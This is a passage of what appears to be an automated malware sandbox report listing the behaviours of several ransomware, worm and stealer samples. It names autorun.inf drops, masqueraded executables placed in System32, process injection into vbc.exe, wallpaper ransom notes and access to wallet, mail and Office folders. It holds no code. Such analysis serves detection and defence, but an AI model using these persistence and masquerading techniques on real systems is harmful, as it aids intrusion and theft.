File opened (read-only) \??\p: C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A
File opened (read-only) \??\z: C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A
File opened (read-only) \??\b: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\j: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\o: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\t: C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A
File opened (read-only) \??\e: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\h: C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A
File opened (read-only) \??\o: C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A
File opened (read-only) \??\j: C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A
File opened (read-only) \??\q: C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A
File opened (read-only) \??\s: C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A
File opened (read-only) \??\i: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\g: C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A
File opened (read-only) \??\i: C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A
File opened (read-only) \??\w: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\a: C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A
File opened (read-only) \??\p: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\r: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\s: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\u: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\v: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\h: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\k: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\l: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\x: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\k: C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A
File opened (read-only) \??\r: C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A whatismyipaddress.com N/A N/A
N/A api.ipify.org N/A N/A
N/A ip-api.com N/A N/A
N/A whatismyipaddress.com N/A N/A

Drops autorun.inf file

Description Indicator Process Target
File created C:\autorun.inf C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
File opened for modification C:\autorun.inf C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
File created F:\autorun.inf C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
File opened for modification F:\autorun.inf C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\excel C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File created C:\Windows\System32\WerFault\9e8d7a4ca61bd92aff00cc37a7a4d62a2cac998d C:\Users\Admin\Desktop\6.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File created C:\Windows\SysWOW64\setting.ini C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A
File created C:\Windows\System32\sc\RuntimeBroker.exe C:\Users\Admin\Desktop\6.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\word C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File created C:\Windows\System32\sc\9e8d7a4ca61bd92aff00cc37a7a4d62a2cac998d C:\Users\Admin\Desktop\6.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File created C:\Windows\System32\WerFault\RuntimeBroker.exe C:\Users\Admin\Desktop\6.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\thunderbird C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File created C:\Windows\SysWOW64\RVHOST.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A
File opened for modification C:\Windows\SysWOW64\setting.ini C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\bitcoin C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\the bat! C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\bitcoin C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft sql server C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File created C:\Windows\System32\L2SecHC\dllhost.exe C:\Users\Admin\Desktop\6.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\office C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File created C:\Windows\System32\mpr\9e8d7a4ca61bd92aff00cc37a7a4d62a2cac998d C:\Users\Admin\Desktop\6.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\onenote C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\powerpoint C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\steam C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft sql server C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\thunderbird C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\documents C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File created C:\Windows\System32\L2SecHC\5940a34987c99120d96dace90a3f93f329dcad63 C:\Users\Admin\Desktop\6.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\excel C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\word C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\powerpoint C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Windows\SysWOW64\RVHOST.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\excel C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\office C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\desktop C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\office C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File created C:\Windows\System32\mpr\RuntimeBroker.exe C:\Users\Admin\Desktop\6.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpDE4A.bmp" C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\\\000.bmp" C:\Users\Admin\Desktop\8.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 5868 set thread context of 5340 N/A C:\Users\Admin\Desktop\7.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 5868 set thread context of 3244 N/A C:\Users\Admin\Desktop\7.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\excel C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{FB050~1\WINDOW~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\Program Files\InstallExpand.MTS C:\Users\Admin\Desktop\8.exe N/A
File opened for modification \??\c:\program files\ C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmprph.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Program Files\UnprotectSet.MOD C:\Users\Admin\Desktop\8.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\PROGRA~3\ADOBER~1\GEFORC~1.EXE C:\Windows\svchost.com N/A
File created C:\Program Files (x86)\Microsoft\DesktopLayer.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
File opened for modification C:\Program Files\TracePing.jpg C:\Users\Admin\Desktop\8.exe N/A
File opened for modification C:\Program Files\UseClear.htm C:\Users\Admin\Desktop\8.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jucheck.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\INSTAL~1\setup.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13181~1.5\MICROS~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13181~1.5\MI391D~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File created C:\Program Files (x86)\Microsoft\DesktopLayer.exe C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jusched.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ExtExport.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ieinstal.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ielowutil.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files (x86)\Windows Mail\dwm.exe C:\Users\Admin\Desktop\6.exe N/A
File opened for modification C:\Program Files\ExitSet.html C:\Users\Admin\Desktop\8.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\PWAHEL~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\setup_wm.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmpconfig.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\px739A.tmp C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\NOTIFI~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\Program Files\FormatUnprotect.php C:\Users\Admin\Desktop\8.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{17316~1\WINDOW~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\Program Files\6b5b0cab8df9d59f.tmp C:\Users\Admin\Desktop\8.exe N/A
File opened for modification C:\Program Files\ShowLimit.iso C:\Users\Admin\Desktop\8.exe N/A
File opened for modification C:\PROGRA~3\ADOBER~1\GEFORC~1.EXE C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~2\wabmig.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmplayer.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\Program Files\ConvertJoin.contact C:\Users\Admin\Desktop\8.exe N/A
File opened for modification C:\PROGRA~3\ADOBER~1\GEFORC~1.EXE C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\INTERN~1\ieinstal.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\DESKTO~1.EXE C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~2\wabmig.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\PWAHEL~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmpshare.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmplayer.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Program Files\MeasureGet.csv C:\Users\Admin\Desktop\8.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft sql server C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\program files (x86)\the bat! C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\program files (x86)\word C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\onenote C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\steam C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\word C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\powerpoint C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft sql server C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\office C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\office C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\onenote C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\desktop C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\office C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\excel C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft sql server C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\the bat! C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\excel C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\desktop C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\office C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\system32\cmd.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Windows\RVHOST.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\documents C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\office C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\powerpoint C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Windows\svchost.com C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\word C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\thunderbird C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\bitcoin C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\steam C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\thunderbird C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
